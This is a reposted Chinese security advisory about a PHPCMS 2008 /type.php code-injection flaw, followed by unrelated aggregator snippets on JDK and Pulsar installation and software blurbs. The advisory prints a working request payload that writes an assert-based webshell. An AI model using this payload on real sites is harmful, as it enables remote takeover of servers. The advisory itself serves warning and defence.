威胁快报|CVE漏洞—PHPCMS2008 /type.php代码注入高危漏洞预警（CNVD-C-2018-127157/CVE-2018-...-低调大师

威胁快报|CVE漏洞—PHPCMS2008 /type.php代码注入高危漏洞预警（CNVD-C-2018-127157/CVE-2018-...

2018-11-27 622

摘要：11月4日，阿里云安全首次捕获PHPCMS 2008版本的/type.php远程GetShell 0day利用攻击，攻击者可以利用该漏洞远程植入webshell，导致文件篡改、数据泄漏、服务器被远程控制等一系列严重问题。建议受影响用户尽快升级到最新版本修复。

———————
PHPCMS网站内容管理系统是国内主流CMS系统之一，同时也是一个开源的PHP开发框架。

PHPCMS最早于2008年推出，最新版已出到v9.6.3，但由于稳定、灵活、开源的特性，时至今日，PHPCMS2008版本仍被许多网站所使用。

漏洞细节

当攻击者向安装有PHPCMS 2008的网站发送uri为如下文本的payload

/type.php?template=tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rss

微信关注我们

原文链接：https://yq.aliyun.com/articles/673603

转载内容版权归作者及来源网站所有！

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。

Linux服务器---安装jdk

安装jdk jdk是运行或者开发java的必须工具，很多软件都会依赖jdk，因此必须学会安装jdk 1、查看当前系统的jdk情况 [root@localhostwj]# rpm-qa|grepjava tzdata-java-2013g-1.el6.noarch java-1.6.0-openjdk-1.6.0.0-1.66.1.13.0.el6.i686//可以看到当前系统已经安装了jdk，但是版本太旧了 java-1.7.0-openjdk-1.7.0.45-2.4.3.3.el6.i686 2、删除系统jdk包 [root@localhostwj]# yumremove-yjava-1.6.0 [root@localhostwj]# yumremove-yjava-1.7.0 [root@localhostwj]# rpm-qa|grepjava//查看是否删除了 tzdata-java-2013g-1.el6.noarch 3、到官网下载最新的jdk包，http://www.oracle.com/technetwork/java/javase/downloads/index.h...

2018-11-28

596

0x1 摘要本文记录Pulsar 2.2.0版本安装步骤，单机模式（standalone）比较简单，直接参考官网：http://pulsar.apache.org/docs/en/standalone/按步骤执行就行，主要讲解集群模式安装，以及过程中遇到问题的解决。 0x2 环境要求 Linux Java 8 及以上 3 台ZooKeeper集群 0x3 安装顺序安装ZooKeeper集群初始化集群元数据信息安装BookKeeper集群安装Pulsar brokers 下面针对每一步进行详细介绍。 0x4 安装ZooKeeper集群由于我本地环境已经有安装好的ZK集群，可以直接使用，此步省略。 0x5 初始化集群元数据信息初始化元数据信息非常简单，只需一条命令就可以，具体参数的意义看官网更好理解： bin/pulsar initialize-cluster-metadata \ --cluster pulsar-cluster-1 \ --zookeeper zk1.us-west.example.com:2181 \ --configuration-store zk1....

2018-11-28

773

资源下载

更多资源

Mario

马里奥是站在游戏界顶峰的超人气多面角色。马里奥靠吃蘑菇成长，特征是大鼻子、头戴帽子、身穿背带裤，还留着胡子。与他的双胞胎兄弟路易基一起，长年担任任天堂的招牌角色。

Nacos

Nacos /nɑ:kəʊs/ 是 Dynamic Naming and Configuration Service 的首字母简称，一个易于构建 AI Agent 应用的动态服务发现、配置管理和AI智能体管理平台。Nacos 致力于帮助您发现、配置和管理微服务及AI智能体应用。Nacos 提供了一组简单易用的特性集，帮助您快速实现动态服务发现、服务配置、服务元数据、流量管理。Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。

Spring

Spring框架（Spring Framework）是由Rod Johnson于2002年提出的开源Java企业级应用框架，旨在通过使用JavaBean替代传统EJB实现方式降低企业级编程开发的复杂性。该框架基于简单性、可测试性和松耦合性设计理念，提供核心容器、应用上下文、数据访问集成等模块，支持整合Hibernate、Struts等第三方框架，其适用范围不仅限于服务器端开发，绝大多数Java应用均可从中受益。

Rocky Linux

Rocky Linux（中文名：洛基）是由Gregory Kurtzer于2020年12月发起的企业级Linux发行版，作为CentOS稳定版停止维护后与RHEL（Red Hat Enterprise Linux）完全兼容的开源替代方案，由社区拥有并管理，支持x86_64、aarch64等架构。其通过重新编译RHEL源代码提供长期稳定性，采用模块化包装和SELinux安全架构，默认包含GNOME桌面环境及XFS文件系统，支持十年生命周期更新。